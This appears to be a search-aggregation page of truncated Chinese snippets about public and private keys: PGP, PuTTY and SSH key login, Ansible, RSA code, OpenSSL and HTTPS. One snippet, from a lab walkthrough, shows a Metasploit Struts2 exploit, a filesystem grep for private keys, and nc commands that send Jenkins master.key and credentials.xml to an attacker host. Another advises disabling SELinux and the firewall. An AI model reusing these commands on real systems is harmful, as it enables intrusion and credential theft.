他的环境是 Linux Ubuntu ,我的环境是 Mac OS X Lion。...PGP原理及规则 PGP使用双密匙来加密数据。每个使用PGP加密技术的人都要创建一对密匙,一个叫做公匙,另一个叫做私匙。公匙可被广泛传播,你可以贴在自己的网页上或发到专门的公钥管理网站上等等。...私匙属于个人信息,绝不应该泄漏给其他人。 公匙和私匙相互作用对数据进行加密及解密。被公匙加密的数据只能被私匙解密,被私匙加密的数据也只能被一个公匙解密。这样就可以实现双重认证。...在发送信息前,使用B的公匙对信息进行加密。 这样只有B用对应的私匙才能解密收到的信息。所以就保证了信息传输的安全,这就是PGP所谓的加密(encryption)与解密(decryption)。
PUTTY密钥验证: 系统的用户和密码还有密钥也是认证的一种方式,密钥是一对的,分为公钥和私钥,公钥保存在服务器端,私钥保存在客户端,我们先使用PUTTYGEN软件设置Linux密钥验证。 ?...生成完密钥后,得先去Linux上进行一些设置: 1.使用mkdir命令创建一个目录: ? 2.使用chmod命令更改文件权限: ? 3.使用vi在.ssh目录下新建一个文件保存公钥: ?...5.关闭防火墙,Linux的防火墙有两个,一个是selinux一个netfilter(iptables): 临时关闭selinux防火墙: ? 6.打开PUTTY设置私钥文件的保存路径: ?...将公钥保存到Linux后,也保存一份在windows上以防文件被误删之后找不到公钥: ? ? ? ? ? ? 然后点击确定,并连接到Linux: ?
以上例子中存在的问题: 一般不推荐使用上面的ansible_ssh_pass=123456明文密码,应该使用ssh私匙,但是在生产环境中,在主机中不可能只使用一种私匙,可能各种需要无密码连接的服务都使用了私匙...,使用一种私匙很不安全,所以会有各种服务使用不同的私匙,那怎么办呢?...解决: 在ansible中需要使用ansible_ssh_private_key_file='私匙文件路径'来指明ansible这个服务使用的私匙文件路径。...解决: 这里就需要用到vars变量定义,即可以定义一个变量,可以单独为一个主机组定义一个变量指明ssh私匙路径,该主机组的主机即可都是用该变量中指明的ssh私匙文件,也可以为所有主机组(all)定义一个变量...,所有主机都使用变量中指明的的ssh私匙文件。
linux下生成key 使用public/private key让putty(ssh)自动登录(以及linux上使用密钥做ssh自动登陆) 方法一:使用puttygen.exe 第一步:生成密匙 ...点击Save private key 按钮保存公匙和私匙,例如key.ppk,public key不用保存,以后使用Puttygen.exe Load功能就可以显示public key。 ...第二步:上传密匙 用自己的帐号登录linux主机,然后执行下面的命令: $ cd ~ $ mkdir .ssh $ chmod 700 .ssh $ cd .ssh $ cat > authorized_keys...但是如果希望这个private key使用在linux主机上,不用密码登陆上放有public key的主机上, 那么: 第四步:linux private key设置 (运行puttygen.exe... 第一步:产生key ssh-keygen -b 密匙长度 -t 密匙类型 密匙类型可以是:rsa1 (对应SSH1 RSA)、rsa 和 dsa (对应SSH2) 如: $ ssh-keygen
废话不多说,直接上代码! public static void generateKeyPair() throws Exception { KeyPai...
linux靶场搭建 横向移动-Linux靶场-SSH协议&RSA密匙凭证 ~/.ssh/config ~/.ssh/known_hosts ~/.bash_history 一般情况下SSH密钥存放在...grep -ir "BEGIN OPENSSH PRIVATE KEY" /* 参考:https://www.runoob.com/w3cnote/set-ssh-login-key.html 横向移动-Linux...靶场-提权&SSH&密匙&Jenkins等 kali同局域网只能通讯web(172.16.250.10) 1、Web DMZ权限获取 信息收集: nmap 172.16.250.0/24 172.16.250.10.../struts2-showcase 利用漏洞: msfconsole use exploit/multi/http/struts2_content_type_ognl set payload linux...1234 < /home/jenkins/secrets/master.key nc 172.16.250.128 1234 < /home/jenkins/credentials.xml 破解密匙:
-linux-g2.12-64.sh echo 'export PATH=$PATH:$HOME/.aspera/connect/bin ' >> ~/.bashrc # 配置环境变量 source....bashrc 使用 aspera的用法会比prefetch稍微复杂一点,使用之前首先需要知道其私匙(private-key) 的路径。...使用conda安装的aspera私匙位置通常在anaconda3/etc/目录下(miniconda同),官网手动安装的私匙位置通常在~/.aspera/connect/etc/。...以Aspera commands for downloading FastQ files为例,SRA-Explorer提供可以直接复制使用的代码(或脚本),但需要注意的是需要提前对私匙路径进行修改,最后到...Linux中运行即可。
非对称加密 与对称加密相对的是非对称加密,非对称加密的核心思想是使用一对相对的密匙,分为公匙和私匙,私匙自己安全保存,而将公匙公开。..._PADDING, OPENSSL_NO_PADDING,分别为PKCS1填充,或不使用填充; 与此方法相对的还有(传入参数一致): openssl_private_encrypt(); // 使用私匙加密...; openssl_private_decrypt(); // 使用私匙解密; openssl_public_decrypt(); // 使用公匙解密; 还有签名和验签函数: bool openssl_sign...mixed $signature_alg = OPENSSL_ALGO_SHA1 ] ) 签名函数:$data为要签名的数据;$signature为签名结果的引用变量;$priv_key_id为签名所使用的私匙...openssl_get_md_methods ()得到,形如: array( 0 => MD5, 1 => SHA1, 2 => SHA256, ... ) 验签函数:与签名函数相对,只不过它要传入与私匙对应的公匙
我只简要说下需要哪些工具,以及一个才搞清楚的问题:为什么有时候GitExtension打死都不出来加载私匙的对话框,就像下图,PuTTY SSH 加载SSH密匙,这里经常就莫名其妙的消失了,虽然我承认我手贱不知道改了哪里...,GitExtension就是通过这个来识别代码区别的.另一个是Select SSH Client,这里选择PuTTY,因为OpenSSH是通过命令行对话框登陆,这里并不方便而采用PuTTY,可以通过私匙登陆...SSH配置成PuTTY登陆方式.如下图: image.png 其他的都比较容易,就不在赘述. 3.公匙和私匙的使用....接下来就是用PuTTY Key Generator(puttygen.exe)生成公匙和私匙.然后把公匙在Github或oschina上配置.如何在Github上配置公匙有很多文章讲述了,我在这里讲下如何在...管理远程,然后配置名称和网址.在下面浏览并加载SSH密匙,然后测试连接.下面会写到如果没有出现”加载SSH密匙”,要怎么办.
rsa加密是非对称加密,即公钥与私钥是成对的,使用公匙加密,使用私匙解密 1.得到公匙私匙 public static void RSAGenerateKey(ref string privateKey...); privateKey = rsa.ToXmlString(true); publicKey = rsa.ToXmlString(false); } 2.公匙加密字符串...Encoding.UTF8.GetBytes(content), false); return Convert.ToBase64String(cipherbytes); ; } 3.私匙解密字符串
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
对称加密 对称加密算法是消息发送者和接收者使用同一个密匙,发送者使用密匙加密了文件, 接收者使用同样的密匙解密,获取信息。常见的对称加密算法有:des/aes/3des....对称加密算法的特点有:速度快,加密前后文件大小变化不大,但是密匙的保管是个大问题 ,因为消息发送方和接收方任意一方的密匙丢失,都会导致信息传输变得不安全。...非对称加密 与对称加密相对的是非对称加密,非对称加密的核心思想是使用一对相对的密匙 分为公匙和私匙,私匙自己安全保存,而将公匙公开。...PADDING, OPENSSL_NO_PADDING,分别为PKCS1填充,或不使用填充; 签名函数:$data为要签名的数据;$signature为签名结果的引用变量;$priv_key_id为签名所使用的私匙...;$signature_alg为签名要使用的算法 ,其算法列表可以使用openssl_get_md_methods()得到 验签函数:与签名函数相对,只不过它要传入与私匙对应的公匙;其结果为签名验证结果
通过公匙加密,使用私匙解密。私匙是通过公匙计算生成的。假设ABC三方之间相互要进行加密通信。...大家相互之间使用公匙进行信息加密,信息读取时使用各自对应的私匙进行信息解密 传入一个参数 5 84 85 peach import matplotlib.pyplot as plt
信息接受者有两把钥匙:一把“公匙”,一把“私匙”。公匙是给信息发送者用来加密的,私匙是自己用来解密的这样最大的好处是:不必通过不安全的渠道发送私密的东西。公匙本来就是给别人用的,不用藏好。...你的私匙在你产生私匙的电脑里保存着。...当你的浏览器向服务器请求一个安全的网页(通常是 https://) 服务器就把它的证书和公匙发回来 浏览器检查证书是不是由可以信赖的机构颁发的,确认证书有效和此证书是此网站的。...使用公钥加密了一个随机对称密钥,包括加密的URL一起发送到服务器 服务器用自己的私匙解密了你发送的钥匙。然后用这把对称加密的钥匙给你请求的URL链接解密。 服务器用你发的对称钥匙给你请求的网页加密。
使用公匙和私匙实现免密效果 上面我们使用的过程中每次都需要输入 git 用户的密码才能和服务端交互,这样会很麻烦,这时候我们可以配置公私匙来实现免密。...首先,需要在客户端生成公私匙: ssh-keygen -t rsa 回车后会提示输入私匙的密码,如果要免密就直接回车,否则自定义一个密码(如果自定义了密码,则每次 push 和 pull 时填入的是设置的密码...命令执行成功后,会在当前用户目录的.ssh文件夹(Windows 目录是 X:\Users{username}.ssh, Linux 是 /home/{username}/.ssh)生成文件「id_rsa...」和「id_rsa.pub」,其中 .pub 文件就是公匙,另一个是私匙。
签名的时候,对于DSA生成的私匙必须要和DSS1(即SHA1)搭配。而对于RSA生成的私匙,任何消息摘要算法都可使用。...genrsa命令生成新的RSA私匙,推荐的私匙长度为1024位,不建议低于该值或者高于2048位。 缺省情况下私匙不被加密,但是可用DES、3DES或者IDEA加密。...rsa命令可用来添加、修改、删除私匙的加密保护,也可用来从私匙中生成RSA公匙,或者用来显示私匙或公匙信息。 rsautl命令提供RSA加密和签名功能。...############################################################# # RSA应用例子 # 产生1024位RSA私匙,用3DES加密它,口令为trousers...openssl smime -decrypt -in mail.enc -recip cert.pem -inkey key.pem -out mail.txt # cert.pem为X.509证书文件,用私匙
1.对称加密算法 对称加密算法的加密和解密使用的密匙是相同的,也就是说如果通讯两方如果使用对称加密算法来加密通讯数据,那么通讯双方就需要都知道这个密匙,收到通讯数据后用这个密匙来解密数据。...2.非对称加密算法 非对称算法中用到的密匙有两个,分别是公匙和私匙,要求通讯双方都有自己的公匙和私匙,自己公匙加密的数据只有自己的私匙才能解开,自己私匙加密的数据也只有自己的公匙才能解开。...公匙是可以公布在网络上的,相当于一个公共的电话簿,可以被其他人获取到的。...以一个通信的例子来说明非对称算法: A 要和 B 进行通信,A在网络上获取到B的公匙,然后把数据用B的公匙进行加密发送给B,B收到了数据后就用自己的私匙进行解密数据,然后就可以看到数据内容了...,即使在网络传输中加密数据被黑客截取,由于黑客没有对应的私匙,他也无法解密数据进行查看。
Android中的加密算法可以分为两类:对称加密 和 非对称加密 对称加密(DES、3DES、AES) 概念 对称加密算法中,发送方将明文和加密密匙经过特殊加密算法处理后,使其形成变成复杂的密文后发送出去...接受方用同样的密匙、同样加密算法的逆算法对密文进行解密。传统的DES加密算法只有56位密匙,最新AES技术拥有128位密匙。大大提高了安全性。...优点:算法公开、计算量小、加密速度快、加密效率高 缺点:发送方和接受方拥有同样的密匙,安全问题得不到保证;管理密匙会成为额外的负担;可逆。...非对称加密(MD5、SHA、RSA、DSA) 概念 非对称加密算法中,发送方和接收方需要使用完全不同但又完全匹配的一对钥匙即 公匙 和 私匙来加密和解密数据。...如果发送方只想要接收方解密数据,发送方就需要先拿到接收方的公匙,并且发送方并不知道接收方的私匙。
拉取代码,重启服务 Action的基本介绍 可以去阮一峰的博客看看 感觉挺不错: GitHub Actions 入门教程 我们需要给github服务器授权在自己的服务器上执行一些命令,所以需要给它授权,把私匙给它...在仓库的Settings中,将步骤1中生成的私匙添加到Secrets中(注意添加时Name是后面actions中要用到的)。...一般会把私匙、服务器Host、服务器User都添加到Secrets中,这样,如果后续更改服务器或者登陆用户时就不需要改代码了。
补充知识: 证书是由CA(数字证书认证机构)认证、签发及管理的、实现身份识别和电子信息加密,为网络上通信双方提供电子认证,其包含的公匙和私匙是所有者的网络识别信息...证书包含CA信息、公匙用户(证书所有者)信息、公匙、有效期等信息,目前,证书的普遍遵守由国际电信联盟(ITU-T)制定的X.509数字证书标准。...PFX证书包含公匙和受密码保护的私匙,BER(Basic Encode Rules)编码,是比较常见的,但是BER编码具有编码不唯一性,也就是说,一个相同的对象通过BER编码可能会产生几种不同的编码数据
领取专属 10元无门槛券
手把手带您无忧上云